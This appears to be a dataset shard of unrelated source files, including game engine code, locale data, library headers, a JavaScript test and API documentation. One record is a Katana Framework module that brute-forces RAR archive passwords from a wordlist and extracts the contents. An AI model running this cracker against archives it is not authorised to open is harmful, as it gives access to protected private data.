fog->_fogColor.g * fogCoeficient;\n\t\t\toutColor->b = outColor->b * (1.0f - fogCoeficient) + fog->_fogColor.b * fogCoeficient;\n\t\t}\n\t}\n\n\t*outCoeficient = *outCoeficient * (1.0f - _fadeDensity);\n\toutColor->r = outColor->r * (1.0f - _fadeDensity) + _fadeColor.r * _fadeDensity;\n\toutColor->g = outColor->g * (1.0f - _fadeDensity) + _fadeColor.g * _fadeDensity;\n\toutColor->b = outColor->b * (1.0f - _fadeDensity) + _fadeColor.b * _fadeDensity;\n}\n\nFog *SetEffects::findFog(const Common::String &fogName) const {\n\tif (!_fogs) {\n\t\treturn nullptr;\n\t}\n\n\tFog *fog = _fogs;\n\n\twhile (fog != nullptr) {\n\t\tif (fogName.compareTo(fog->_name) == 0) {\n\t\t\tbreak;\n\t\t}\n\t\tfog = fog->_next;\n\t}\n\n\treturn fog;\n}\n\n} // End of namespace BladeRunner\n"} {"text": "# This module requires katana framework \n# https://github.com/PowerScript/KatanaFramework\n\n# :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: #\n# Katana Core import #\nfrom core.KatanaFramework import * #\n# :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: #\n\n# LIBRARIES\nfrom lib.rarfile.RARfile import *\n# END LIBRARIES \n\n# INFORMATION MODULE\ndef init():\n\tinit.Author =\"LeSZO ZerO\"\n\tinit.Version =\"2.0\"\n\tinit.Description =\"Brute Force to RAR file.\"\n\tinit.CodeName =\"fle/bt.rar\"\n\tinit.DateCreation =\"28/02/2015\" \n\tinit.LastModification =\"01/06/2016\"\n\tinit.References =None\n\tinit.License =KTF_LINCENSE\n\tinit.var ={}\n\n\t# DEFAULT OPTIONS MODULE\n\tinit.options = {\n\t\t# NAME VALUE RQ DESCRIPTION\n\t\t'file':[\"files/test/test.rar\",True ,'RAR file to Crack'],\n\t\t'dict':[DITIONARY_PASSWORDS ,False,'Wordlist']\n\t}\n\treturn init\n# END INFORMATION MODULE\n\n# CODE MODULE ############################################################################################\ndef main(run):\n\tLoadingfile(init.var['dict'])\n\tArch = open(init.var['dict'],\"r\")\n\tleeArchivo = Arch.readlines()\n\tRARarch = RarFile(init.var['file'])\n\tfor palabra in leeArchivo:\n\t\tpalabraLlegada = palabra.split(\"\\n\")\n\t\ttry:\n\t\t\tRARarch.extractall(pwd=str(palabraLlegada[0]),path=\"/root/home/\")\n\t\t\tprintk.suff(\"Successfully with [\"+palabraLlegada[0]+\"] -> /root/home/\")\n\t\t\tUTIL.sRegister(init,palabraLlegada[0])\n\t\t\treturn\n\t\texcept:printk.inf(\" | Checking '\"+palabraLlegada[0]+\"'\")\n\n# END CODE MODULE ############################################################################################\n"} {"text": "define(\n//begin v1.x content\n{\n\t\"days-standAlone-short\": [\n\t\t\"日\",\n\t\t\"月\",\n\t\t\"火\",\n\t\t\"水\",\n\t\t\"木\",\n\t\t\"金\",\n\t\t\"土\"\n\t],\n\t\"months-format-narrow\": [\n\t\t\"1\",\n\t\t\"2\",\n\t\t\"3\",\n\t\t\"4\",\n\t\t\"5\",\n\t\t\"6\",\n\t\t\"7\",\n\t\t\"8\",\n\t\t\"9\",\n\t\t\"10\",\n\t\t\"11\",\n\t\t\"12\"\n\t],\n\t\"field-weekday\": \"曜日\",\n\t\"dateFormatItem-GyMMMEd\": \"Gy年M月d日(E)\",\n\t\"dateFormatItem-MMMEd\": \"M月d日(E)\",\n\t\"days-format-short\": [\n\t\t\"日\",\n\t\t\"月\",\n\t\t\"火\",\n\t\t\"水\",\n\t\t\"木\",\n\t\t\"金\",\n\t\t\"土\"\n\t],\n\t\"dateFormat-long\": \"Gy年M月d日\",\n\t\"months-format-wide\": [\n\t\t\"ムハッラム\",\n\t\t\"サフアル\",\n\t\t\"ラビー・ウル・アウワル\",\n\t\t\"ラビー・ウッ・サーニー\",\n\t\t\"ジュマーダル・アウワル\",\n\t\t\"ジュマーダッサーニー\",\n\t\t\"ラジャブ\",\n\t\t\"シャアバーン\",\n\t\t\"ラマダーン\",\n\t\t\"シャウワール\",\n\t\t\"ズル・カイダ\",\n\t\t\"ズル・ヒッジャ\"\n\t],\n\t\"dateFormatItem-yyyyQQQ\": \"Gy/QQQ\",\n\t\"dayPeriods-format-wide-pm\": \"午後\",\n\t\"dateFormat-full\": \"Gy年M月d日EEEE\",\n\t\"dateFormatItem-yyyyMEd\": \"Gy/M/d(E)\",\n\t\"dateFormatItem-Md\": \"M/d\",\n\t\"field-era\": 
\"時代\",\n\t\"months-standAlone-wide\": [\n\t\t\"ムハッラム\",\n\t\t\"サフアル\",\n\t\t\"ラビー・ウル・アウワル\",\n\t\t\"ラビー・ウッ・サーニー\",\n\t\t\"ジュマーダル・アウワル\",\n\t\t\"ジュマーダッサーニー\",\n\t\t\"ラジャブ\",\n\t\t\"シャアバーン\",\n\t\t\"ラマダーン\",\n\t\t\"シャウワール\",\n\t\t\"ズル・カイダ\",\n\t\t\"ズル・ヒッジャ\"\n\t],\n\t\"timeFormat-short\": \"H:mm\",\n\t\"quarters-format-wide\": [\n\t\t\"第1四半期\",\n\t\t\"第2四半期\",\n\t\t\"第3四半期\",\n\t\t\"第4四半期\"\n\t],\n\t\"timeFormat-long\": \"H:mm:ss z\",\n\t\"field-year\": \"年\",\n\t\"field-hour\": \"時\",\n\t\"months-format-abbr\": [\n\t\t\"ムハッラム\",\n\t\t\"サフアル\",\n\t\t\"ラビー・ウル・アウワル\",\n\t\t\"ラビー・ウッ・サーニー\",\n\t\t\"ジュマーダル・アウワル\",\n\t\t\"ジュマーダッサーニー\",\n\t\t\"ラジャブ\",\n\t\t\"シャアバーン\",\n\t\t\"ラマダーン\",\n\t\t\"シャウワール\",\n\t\t\"ズル・カイダ\",\n\t\t\"ズル・ヒッジャ\"\n\t],\n\t\"timeFormat-full\": \"H時mm分ss秒 zzzz\",\n\t\"field-day-relative+0\": \"今日\",\n\t\"field-day-relative+1\": \"明日\",\n\t\"dateFormatItem-GyMMMd\": \"Gy年M月d日\",\n\t\"field-day-relative+2\": \"明後日\",\n\t\"dateFormatItem-H\": \"H時\",\n\t\"months-standAlone-abbr\": [\n\t\t\"ムハッラム\",\n\t\t\"サフアル\",\n\t\t\"ラビー・ウル・アウワル\",\n\t\t\"ラビー・ウッ・サーニー\",\n\t\t\"ジュマーダル・アウワル\",\n\t\t\"ジュマーダッサーニー\",\n\t\t\"ラジャブ\",\n\t\t\"シャアバーン\",\n\t\t\"ラマダーン\",\n\t\t\"シャウワール\",\n\t\t\"ズル・カイダ\",\n\t\t\"ズル・ヒッジャ\"\n\t],\n\t\"quarters-format-abbr\": [\n\t\t\"1Q\",\n\t\t\"2Q\",\n\t\t\"3Q\",\n\t\t\"4Q\"\n\t],\n\t\"dateFormatItem-Gy\": \"Gy年\",\n\t\"dateFormatItem-yyyyMMMEd\": \"Gy年M月d日(E)\",\n\t\"dateFormatItem-M\": \"M月\",\n\t\"dateFormatItem-yyyyMMM\": \"Gy年M月\",\n\t\"dateFormatItem-yyyyMMMd\": \"Gy年M月d日\",\n\t\"timeFormat-medium\": \"H:mm:ss\",\n\t\"dateFormatItem-Hm\": \"H:mm\",\n\t\"eraAbbr\": [\n\t\t\"AH\"\n\t],\n\t\"field-minute\": \"分\",\n\t\"field-dayperiod\": \"午前/午後\",\n\t\"dateFormatItem-d\": \"d日\",\n\t\"field-day-relative+-1\": \"昨日\",\n\t\"dateFormatItem-h\": \"aK時\",\n\t\"field-day-relative+-2\": \"一昨日\",\n\t\"dateFormatItem-MMMd\": \"M月d日\",\n\t\"dateFormatItem-MEd\": \"M/d(E)\",\n\t\"field-day\": \"日\",\n\t\"days-format-wide\": [\n\t\t\"日曜日\",\n\t\t\"月曜日\",\n\t\t\"火曜日\",\n\t\t\"水曜日\",\n\t\t\"木曜日\",\n\t\t\"金曜日\",\n\t\t\"土曜日\"\n\t],\n\t\"field-zone\": \"タイムゾーン\",\n\t\"dateFormatItem-y\": \"Gy年\",\n\t\"months-standAlone-narrow\": [\n\t\t\"1\",\n\t\t\"2\",\n\t\t\"3\",\n\t\t\"4\",\n\t\t\"5\",\n\t\t\"6\",\n\t\t\"7\",\n\t\t\"8\",\n\t\t\"9\",\n\t\t\"10\",\n\t\t\"11\",\n\t\t\"12\"\n\t],\n\t\"field-year-relative+-1\": \"昨年\",\n\t\"field-month-relative+-1\": \"先月\",\n\t\"dateFormatItem-hm\": \"aK:mm\",\n\t\"days-format-abbr\": [\n\t\t\"日\",\n\t\t\"月\",\n\t\t\"火\",\n\t\t\"水\",\n\t\t\"木\",\n\t\t\"金\",\n\t\t\"土\"\n\t],\n\t\"dateFormatItem-yyyyMd\": \"Gy/M/d\",\n\t\"field-month\": \"月\",\n\t\"days-standAlone-narrow\": [\n\t\t\"日\",\n\t\t\"月\",\n\t\t\"火\",\n\t\t\"水\",\n\t\t\"木\",\n\t\t\"金\",\n\t\t\"土\"\n\t],\n\t\"dateFormatItem-MMM\": \"M月\",\n\t\"dayPeriods-format-wide-am\": \"午前\",\n\t\"dateFormat-short\": \"Gy/MM/dd\",\n\t\"field-second\": \"秒\",\n\t\"field-month-relative+0\": \"今月\",\n\t\"field-month-relative+1\": \"翌月\",\n\t\"dateFormatItem-Ed\": \"d日(E)\",\n\t\"field-week\": \"週\",\n\t\"dateFormat-medium\": \"Gy/MM/dd\",\n\t\"field-year-relative+0\": \"今年\",\n\t\"field-week-relative+-1\": \"先週\",\n\t\"dateFormatItem-yyyyM\": \"Gy/M\",\n\t\"field-year-relative+1\": \"翌年\",\n\t\"dateFormatItem-yyyyQQQQ\": \"GyQQQQ\",\n\t\"dateFormatItem-Hms\": \"H:mm:ss\",\n\t\"dateFormatItem-hms\": \"aK:mm:ss\",\n\t\"dateFormatItem-GyMMM\": \"Gy年M月\",\n\t\"dateFormatItem-yyyy\": \"Gy年\",\n\t\"field-week-relative+0\": \"今週\",\n\t\"field-week-relative+1\": \"翌週\"\n}\n//end v1.x content\n);"} {"text": "#ifndef 
LUASOCKET_H\n#define LUASOCKET_H\n/*=========================================================================*\\\n* LuaSocket toolkit\n* Networking support for the Lua language\n* Diego Nehab\n* 9/11/1999\n\\*=========================================================================*/\n\n/*-------------------------------------------------------------------------* \\\n* Current socket library version\n\\*-------------------------------------------------------------------------*/\n#define LUASOCKET_VERSION \"LuaSocket 3.0-rc1\"\n#define LUASOCKET_COPYRIGHT \"Copyright (C) 1999-2013 Diego Nehab\"\n\n/*-------------------------------------------------------------------------*\\\n* This macro prefixes all exported API functions\n\\*-------------------------------------------------------------------------*/\n#ifndef LUASOCKET_API\n#ifdef _WIN32\n#define LUASOCKET_API __declspec(dllexport)\n#else\n#define LUASOCKET_API __attribute__ ((visibility (\"default\")))\n#endif\n#endif\n\n#include \"lua.h\"\n#include \"lauxlib.h\"\n#include \"compat.h\"\n\n/*-------------------------------------------------------------------------*\\\n* Initializes the library.\n\\*-------------------------------------------------------------------------*/\nLUASOCKET_API int luaopen_socket_core(lua_State *L);\n\n#endif /* LUASOCKET_H */\n"} {"text": "package com.sohu.cache.web.vo;\r\n\r\nimport java.util.Date;\r\n\r\n\r\n/**\r\n * Created by yijunzhang on 14-10-14.\r\n */\r\npublic class RedisSlowLog {\r\n\r\n /**\r\n * 慢查询id\r\n */\r\n private long id;\r\n\r\n /**\r\n * 执行时间点\r\n */\r\n private String timeStamp;\r\n\r\n /**\r\n * 慢查询执行时间(微秒)\r\n */\r\n private long executionTime;\r\n\r\n private String command;\r\n \r\n /**\r\n * 执行日期时间\r\n */\r\n private Date date;\r\n\r\n public long getId() {\r\n return id;\r\n }\r\n\r\n public void setId(long id) {\r\n this.id = id;\r\n }\r\n\r\n public String getTimeStamp() {\r\n return timeStamp;\r\n }\r\n\r\n public void setTimeStamp(String timeStamp) {\r\n this.timeStamp = timeStamp;\r\n }\r\n\r\n public long getExecutionTime() {\r\n return executionTime;\r\n }\r\n\r\n public void setExecutionTime(long executionTime) {\r\n this.executionTime = executionTime;\r\n }\r\n\r\n public String getCommand() {\r\n return command;\r\n }\r\n\r\n public void setCommand(String command) {\r\n this.command = command;\r\n }\r\n\r\n public Date getDate() {\r\n return date;\r\n }\r\n\r\n public void setDate(Date date) {\r\n this.date = date;\r\n }\r\n\r\n @Override\r\n public String toString() {\r\n return \"RedisSlowLog [id=\" + id + \", timeStamp=\" + timeStamp + \", executionTime=\" + executionTime\r\n + \", command=\" + command + \", date=\" + date + \"]\";\r\n }\r\n\r\n}\r\n"} {"text": "\r\n{\r\n \"Info\": [\r\n {\r\n \"IsSuccess\": \"True\",\r\n \"InAddress\": \"彰化縣和美鎮和線路91號\",\r\n \"InSRS\": \"EPSG:4326\",\r\n \"InFuzzyType\": \"[單雙號機制]+[最近門牌號機制]\",\r\n \"InFuzzyBuffer\": \"0\",\r\n \"InIsOnlyFullMatch\": \"False\",\r\n \"InIsLockCounty\": \"True\",\r\n \"InIsLockTown\": \"False\",\r\n \"InIsLockVillage\": \"False\",\r\n \"InIsLockRoadSection\": \"False\",\r\n \"InIsLockLane\": \"False\",\r\n \"InIsLockAlley\": \"False\",\r\n \"InIsLockArea\": \"False\",\r\n \"InIsSameNumber_SubNumber\": \"True\",\r\n \"InCanIgnoreVillage\": \"True\",\r\n \"InCanIgnoreNeighborhood\": \"True\",\r\n \"InReturnMaxCount\": \"0\",\r\n \"OutTotal\": \"1\",\r\n \"OutMatchType\": \"完全比對\",\r\n \"OutMatchCode\": \"[彰化縣]\\tFULL:1\",\r\n \"OutTraceInfo\": \"[彰化縣]\\t { 完全比對 } 找到符合的門牌地址\"\r\n }\r\n ],\r\n \"AddressList\": 
[\r\n {\r\n \"FULL_ADDR\": \"彰化縣和美鎮和西里23鄰和線路91號\",\r\n \"COUNTY\": \"彰化縣\",\r\n \"TOWN\": \"和美鎮\",\r\n \"VILLAGE\": \"和西里\",\r\n \"NEIGHBORHOOD\": \"23鄰\",\r\n \"ROAD\": \"和線路\",\r\n \"SECTION\": \"\",\r\n \"LANE\": \"\",\r\n \"ALLEY\": \"\",\r\n \"SUB_ALLEY\": \"\",\r\n \"TONG\": \"\",\r\n \"NUMBER\": \"91號\",\r\n \"X\": 120.492508,\r\n \"Y\": 24.114519\r\n }\r\n ]\r\n}"} {"text": "\n\n\n\n \n \n See http://www.w3.org/XML/1998/namespace.html and\n http://www.w3.org/TR/REC-xml for information about this namespace.\n\n This schema document describes the XML namespace, in a form\n suitable for import by other schema documents.\n\n Note that local names in this namespace are intended to be defined\n only by the World Wide Web Consortium or its subgroups. The\n following names are currently defined in this namespace and should\n not be used with conflicting semantics by any Working Group,\n specification, or document instance:\n\n base (as an attribute name): denotes an attribute whose value\n provides a URI to be used as the base for interpreting any\n relative URIs in the scope of the element on which it\n appears; its value is inherited. This name is reserved\n by virtue of its definition in the XML Base specification.\n\n lang (as an attribute name): denotes an attribute whose value\n is a language code for the natural language of the content of\n any element; its value is inherited. This name is reserved\n by virtue of its definition in the XML specification.\n\n space (as an attribute name): denotes an attribute whose\n value is a keyword indicating what whitespace processing\n discipline is intended for the content of the element; its\n value is inherited. This name is reserved by virtue of its\n definition in the XML specification.\n\n Father (in any context at all): denotes Jon Bosak, the chair of\n the original XML Working Group. This name is reserved by\n the following decision of the W3C XML Plenary and\n XML Coordination groups:\n\n In appreciation for his vision, leadership and dedication\n the W3C XML Plenary on this 10th day of February, 2000\n reserves for Jon Bosak in perpetuity the XML name\n xml:Father\n \n \n\n \n This schema defines attributes and an attribute group\n suitable for use by\n schemas wishing to allow xml:base, xml:lang or xml:space attributes\n on elements they define.\n\n To enable this, such a schema must import this schema\n for the XML namespace, e.g. as follows:\n <schema . . .>\n . . .\n <import namespace=\"http://www.w3.org/XML/1998/namespace\"\n schemaLocation=\"http://www.w3.org/2001/03/xml.xsd\"/>\n\n Subsequently, qualified reference to any of the attributes\n or the group defined below will have the desired effect, e.g.\n\n <type . . .>\n . . .\n <attributeGroup ref=\"xml:specialAttrs\"/>\n\n will define a type which will schema-validate an instance\n element with any of those attributes\n \n\n \n\n \n In keeping with the XML Schema WG's standard versioning\n policy, this schema document will persist at\n http://www.w3.org/2001/03/xml.xsd.\n At the date of issue it can also be found at\n http://www.w3.org/2001/xml.xsd.\n The schema document at that URI may however change in the future,\n in order to remain compatible with the latest version of XML Schema\n itself. 
In other words, if the XML Schema namespace changes, the version\n of this document at\n http://www.w3.org/2001/xml.xsd will change\n accordingly; the version at\n http://www.w3.org/2001/03/xml.xsd will not change.\n \n \n\n \n \n In due course, we should install the relevant ISO 2- and 3-letter\n codes as the enumerated possible values . . .\n \n\n \n \n\n \n \n \n \n \n \n\n \n \n\n \n \n See http://www.w3.org/TR/xmlbase/ for\n information about this attribute.\n \n \n \n\n \n \n \n \n \n\n\n"} {"text": "// Copyright 2009 the Sputnik authors. All rights reserved.\n// This code is governed by the BSD license found in the LICENSE file.\n\n/*---\ninfo: Sanity test for \"catch(Indetifier) statement\"\nes5id: 12.14_A4\ndescription: Checking if deleting an exception fails\nflags: [noStrict]\n---*/\n\n// CHECK#1\ntry {\n throw \"catchme\";\n $ERROR('#1.1: throw \"catchme\" lead to throwing exception');\n}\ncatch (e) {\n if (delete e){\n $ERROR('#1.2: Exception has DontDelete property');\n }\n if (e!==\"catchme\") {\n $ERROR('#1.3: Exception === \"catchme\". Actual: Exception ==='+ e );\n }\n}\n\n// CHECK#2\ntry {\n throw \"catchme\";\n $ERROR('#2.1: throw \"catchme\" lead to throwing exception');\n}\ncatch(e){}\ntry{\n e;\n $ERROR('#2.2: Deleting catching exception after ending \"catch\" block');\n}\ncatch(err){}\n"} {"text": "const LedControl = require(\"./ledcontrol\");\n\nclass Matrix extends LedControl {\n constructor(options) {\n options.isMatrix = true;\n super(options);\n }\n\n static get CHARS() {\n return LedControl.MATRIX_CHARS;\n }\n}\n\nmodule.exports = Matrix;\n"} {"text": "package io.github.chrislo27.rhre3.oopsies\n\nimport java.util.*\n\n/**\n * Supports undoing and redoing on this instance.\n * @param maxItems Max items, <= 0 is infinite\n * @param SELF The real impl\n */\n@Suppress(\"UNCHECKED_CAST\")\nopen class ActionHistory>(val maxItems: Int = 128) {\n\n private fun createDeque(): Deque> {\n return ArrayDeque()\n }\n\n private val undos: Deque> = createDeque()\n private val redos: Deque> = createDeque()\n\n /**\n * Mutate this object, adding the action on the undo stack, and clearing all redos.\n */\n fun mutate(action: ReversibleAction) {\n addActionWithoutMutating(action)\n\n action.redo(this as SELF)\n }\n\n /**\n * Adds an action without calling the redo method of the action.\n */\n fun addActionWithoutMutating(action: ReversibleAction) {\n redos.clear()\n undos.push(action)\n }\n\n fun ensureCapacity() {\n if (maxItems > 0) {\n if (undos.size > maxItems) {\n undos.removeLast()\n }\n\n if (redos.size > maxItems) {\n redos.removeLast()\n }\n }\n }\n\n fun undo(): Boolean {\n if (!canUndo()) return false\n\n val action = undos.pop()\n action.undo(this as SELF)\n\n redos.push(action)\n\n return true\n }\n\n fun redo(): Boolean {\n if (!canRedo()) return false\n\n val action = redos.pop()\n action.redo(this as SELF)\n\n undos.push(action)\n\n return true\n }\n\n fun canUndo() = undos.size > 0\n\n fun canRedo() = redos.size > 0\n\n fun clear() {\n undos.clear()\n redos.clear()\n }\n\n fun getUndoStack() = undos\n fun getRedoStack() = redos\n\n}\n"} {"text": "/* map_type.h\n *\n * Micropolis, Unix Version. This game was released for the Unix platform\n * in or about 1990 and has been modified for inclusion in the One Laptop\n * Per Child program. Copyright (C) 1989 - 2007 Electronic Arts Inc. 
If\n * you need assistance with this program, you may contact:\n * http://wiki.laptop.org/go/Micropolis or email micropolis@laptop.org.\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or (at\n * your option) any later version.\n *\n * This program is distributed in the hope that it will be useful, but\n * WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n * General Public License for more details. You should have received a\n * copy of the GNU General Public License along with this program. If\n * not, see .\n *\n * ADDITIONAL TERMS per GNU GPL Section 7\n *\n * No trademark or publicity rights are granted. This license does NOT\n * give you any right, title or interest in the trademark SimCity or any\n * other Electronic Arts trademark. You may not distribute any\n * modification of this program using the trademark SimCity or claim any\n * affliation or association with Electronic Arts Inc. or its employees.\n *\n * Any propagation or conveyance of this program must include this\n * copyright notice and these terms.\n *\n * If you convey this program (or any modifications of it) and assume\n * contractual liability for the program to recipients of it, you agree\n * to indemnify Electronic Arts for any liability that those contractual\n * assumptions impose on Electronic Arts.\n *\n * You may not misrepresent the origins of this program; modified\n * versions of the program must be marked as such and not identified as\n * the original program.\n *\n * This disclaimer supplements the one included in the General Public\n * License. TO THE FULLEST EXTENT PERMISSIBLE UNDER APPLICABLE LAW, THIS\n * PROGRAM IS PROVIDED TO YOU \"AS IS,\" WITH ALL FAULTS, WITHOUT WARRANTY\n * OF ANY KIND, AND YOUR USE IS AT YOUR SOLE RISK. THE ENTIRE RISK OF\n * SATISFACTORY QUALITY AND PERFORMANCE RESIDES WITH YOU. ELECTRONIC ARTS\n * DISCLAIMS ANY AND ALL EXPRESS, IMPLIED OR STATUTORY WARRANTIES,\n * INCLUDING IMPLIED WARRANTIES OF MERCHANTABILITY, SATISFACTORY QUALITY,\n * FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT OF THIRD PARTY\n * RIGHTS, AND WARRANTIES (IF ANY) ARISING FROM A COURSE OF DEALING,\n * USAGE, OR TRADE PRACTICE. ELECTRONIC ARTS DOES NOT WARRANT AGAINST\n * INTERFERENCE WITH YOUR ENJOYMENT OF THE PROGRAM; THAT THE PROGRAM WILL\n * MEET YOUR REQUIREMENTS; THAT OPERATION OF THE PROGRAM WILL BE\n * UNINTERRUPTED OR ERROR-FREE, OR THAT THE PROGRAM WILL BE COMPATIBLE\n * WITH THIRD PARTY SOFTWARE OR THAT ANY ERRORS IN THE PROGRAM WILL BE\n * CORRECTED. NO ORAL OR WRITTEN ADVICE PROVIDED BY ELECTRONIC ARTS OR\n * ANY AUTHORIZED REPRESENTATIVE SHALL CREATE A WARRANTY. 
SOME\n * JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF OR LIMITATIONS ON IMPLIED\n * WARRANTIES OR THE LIMITATIONS ON THE APPLICABLE STATUTORY RIGHTS OF A\n * CONSUMER, SO SOME OR ALL OF THE ABOVE EXCLUSIONS AND LIMITATIONS MAY\n * NOT APPLY TO YOU.\n */\n\n/** @file map_type.h Map data structures */\n\n\n////////////////////////////////////////////////////////////////////////\n// Constants\n\n\n/**\n * Size of the world in horizontal direction.\n */\nstatic const int WORLD_W = 120;\n\n/**\n * Size of the world in vertical direction.\n */\nstatic const int WORLD_H = 100;\n\n\n////////////////////////////////////////////////////////////////////////\n// Template class definitions\n\n\n/**\n * Generic class for maps in the Micropolis game.\n *\n * A map is assumed to cover a 2D grid of #WORLD_W times #WORLD_H positions.\n * A block of positions may be clustered, and represented by a single data\n * value.\n * @tparam DATA Data type of a data value.\n * @tparam BLKSIZE Size of the cluster.\n */\ntemplate \nclass Map\n{\npublic:\n Map(DATA defaultValue);\n Map(const Map& map);\n Map& operator=(const Map &map);\n ~Map();\n\n /** Size of a cluster in number of world positions. */\n const int MAP_BLOCKSIZE;\n const int MAP_W; ///< Number of clusters in horizontal direction.\n const int MAP_H; ///< Number of clusters in vertical direction.\n\n void fill(DATA val);\n void clear();\n\n inline void set(int x, int y, DATA val);\n inline DATA get(int x, int y) const;\n inline bool onMap(int x, int y) const;\n\n inline void worldSet(int x, int y, DATA val);\n inline DATA worldGet(int x, int y) const;\n inline bool worldOnMap(int x, int y) const;\n\n DATA *getBase();\n\nprivate:\n /** Data fields of the map in column-major mode. */\n DATA _mapData[((WORLD_W + BLKSIZE - 1) / BLKSIZE)\n * ((WORLD_H + BLKSIZE -1) / BLKSIZE)];\n\n const DATA _MAP_DEFAULT_VALUE; ///< Default value of a cluster.\n};\n\n\n/**\n * Generic map constructor.\n * @param defaultValue Default value to use for off-map positions, and\n * for clearing the map.\n */\ntemplate \nMap::Map(DATA defaultValue):\n MAP_BLOCKSIZE(BLKSIZE),\n MAP_W((WORLD_W + BLKSIZE - 1) / BLKSIZE),\n MAP_H((WORLD_H + BLKSIZE - 1) / BLKSIZE),\n _MAP_DEFAULT_VALUE(defaultValue)\n{\n}\n\n\n/** Copy constructor */\ntemplate \nMap::Map(const Map &map):\n MAP_BLOCKSIZE(BLKSIZE),\n MAP_W((WORLD_W + BLKSIZE - 1) / BLKSIZE),\n MAP_H((WORLD_H + BLKSIZE - 1) / BLKSIZE),\n _MAP_DEFAULT_VALUE(map._MAP_DEFAULT_VALUE)\n{\n for (int i = 0; i < this->MAP_W * this->MAP_H; i++) {\n this->_mapData[i] = map._mapData[i];\n }\n}\n\n\n/** Assignment operator */\ntemplate \nMap &Map::operator=(const Map &map)\n{\n if(this != &map) {\n for (int i = 0; i < this->MAP_W * this->MAP_H; i++) {\n this->_mapData[i] = map._mapData[i];\n }\n }\n return *this;\n}\n\n\n/** Generic map destructor */\ntemplate \nMap::~Map()\n{\n}\n\n\n/**\n * Generic fill routine.\n *\n * @param value Value with which to fill the map.\n */\ntemplate \nvoid Map::fill(DATA value)\n{\n for (int i = 0; i < this->MAP_W * this->MAP_H; i++) {\n this->_mapData[i] = value;\n }\n}\n\n\n/**\n * Generic clear routine.\n *\n * Resets all data of the map to #_MAP_DEFAULT_VALUE.\n */\ntemplate \nvoid Map::clear()\n{\n fill(this->_MAP_DEFAULT_VALUE);\n}\n\n\n/**\n * Return the base address of the map data.\n * @note Data is stored in column-major mode.\n */\ntemplate \nDATA *Map::getBase()\n{\n return this->_mapData;\n}\n\n\n/**\n * Set the value of a cluster.\n *\n * If the coordinate is off the map, the value is not stored.\n * 
@param x X cluster position (at world position \\a x * #MAP_BLOCKSIZE).\n * @param y Y cluster position (at world position \\a y * #MAP_BLOCKSIZE).\n * @param value Value to use.\n */\ntemplate \ninline void Map::set(int x, int y, DATA value)\n{\n if(this->onMap(x, y)) {\n this->_mapData[x * MAP_H + y] = value;\n }\n}\n\n\n/**\n * Return the value of a cluster.\n *\n * If the coordinate is off the map, the #_MAP_DEFAULT_VALUE is returned.\n * @param x X cluster position (at world position \\a x * #MAP_BLOCKSIZE).\n * @param y Y cluster position (at world position \\a y * #MAP_BLOCKSIZE).\n * @return Value of the cluster.\n */\ntemplate \ninline DATA Map::get(int x, int y) const\n{\n if(!this->onMap(x, y)) {\n return this->_MAP_DEFAULT_VALUE;\n }\n\n return this->_mapData[x * MAP_H + y];\n}\n\n\n/**\n * Verify that cluster coordinates are within map boundaries.\n * @param x X cluster position (at world position \\a x * #MAP_BLOCKSIZE).\n * @param y Y cluster position (at world position \\a y * #MAP_BLOCKSIZE).\n * @return Coordinate is within map boundaries.\n */\ntemplate \ninline bool Map::onMap(int x, int y) const\n{\n return (x >= 0 && x < this->MAP_W) && (y >= 0 && y < this->MAP_H);\n}\n\n\n/**\n * Set the value of a cluster.\n *\n * If the coordinate is off the map, the value is not stored.\n * @param x X world position.\n * @param y Y world position.\n * @param value Value to use.\n */\ntemplate \ninline void Map::worldSet(int x, int y, DATA value)\n{\n if(this->worldOnMap(x, y)) {\n x /= BLKSIZE;\n y /= BLKSIZE;\n this->_mapData[x * MAP_H + y] = value;\n }\n}\n\n\n/**\n * Return the value of a cluster.\n *\n * If the coordinate is off the map, the #_MAP_DEFAULT_VALUE is returned.\n * @param x X world position.\n * @param y Y world position.\n * @return Value of the cluster.\n */\ntemplate \ninline DATA Map::worldGet(int x, int y) const\n{\n if(!this->worldOnMap(x, y)) {\n return this->_MAP_DEFAULT_VALUE;\n }\n\n x /= BLKSIZE;\n y /= BLKSIZE;\n return this->_mapData[x * MAP_H + y];\n}\n\n\n/**\n * Verify that world coordinates are within map boundaries.\n * @param x X world position.\n * @param y Y world position.\n * @return Coordinate is within map boundaries.\n */\ntemplate \ninline bool Map::worldOnMap(int x, int y) const\n{\n return (x >= 0 && x < WORLD_W) && (y >= 0 && y < WORLD_H);\n}\n\n\n////////////////////////////////////////////////////////////////////////\n// Type definitions\n\n\ntypedef Map MapByte1; ///< Map of ::Byte, with cluster size 1\ntypedef Map MapByte2; ///< Map of ::Byte, with cluster size 2\ntypedef Map MapByte4; ///< Map of ::Byte, with cluster size 4\ntypedef Map MapShort8; ///< Map of ::short, with cluster size 8\n\n\n////////////////////////////////////////////////////////////////////////\n"} {"text": "\n\n\nbasic_raw_socket::close (1 of 2 overloads)\n\n\n\n\n\n\n\n\n
\"asio
\n


\n
\n\"Prev\"\"Up\"\"Home\"\"Next\"\n
\n
\n\n

\n Inherited from basic_socket.\n

\n

\n Close the socket.\n

\n
void close();\n
\n

\n This function is used to close the socket. Any asynchronous send, receive\n or connect operations will be cancelled immediately, and will complete\n with the asio::error::operation_aborted error.\n

\n
\n\n Exceptions\n
\n
\n

\n
\n
asio::system_error
\n

\n Thrown on failure. Note that, even if the function indicates an\n error, the underlying descriptor is closed.\n

\n
\n
\n
\n\n Remarks\n
\n

\n For portable behaviour with respect to graceful closure of a connected\n socket, call shutdown() before closing the socket.\n

\n
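  A minimal usage sketch (not part of the original reference page): it assumes
  the standalone asio headers and uses a TCP socket purely for illustration,
  since close() and shutdown() are inherited from basic_socket and apply to a
  basic_raw_socket in the same way.

  #include <asio.hpp>
  #include <iostream>

  int main() {
      asio::io_context ctx;
      asio::ip::tcp::socket sock(ctx);
      // ... open, connect and use the socket ...
      try {
          // Per the remark above, shut down a connected socket before closing it.
          sock.shutdown(asio::ip::tcp::socket::shutdown_both);
          sock.close();
      } catch (const asio::system_error& e) {
          // Even if close() reports an error, the underlying descriptor is closed.
          std::cerr << e.what() << "\n";
      }
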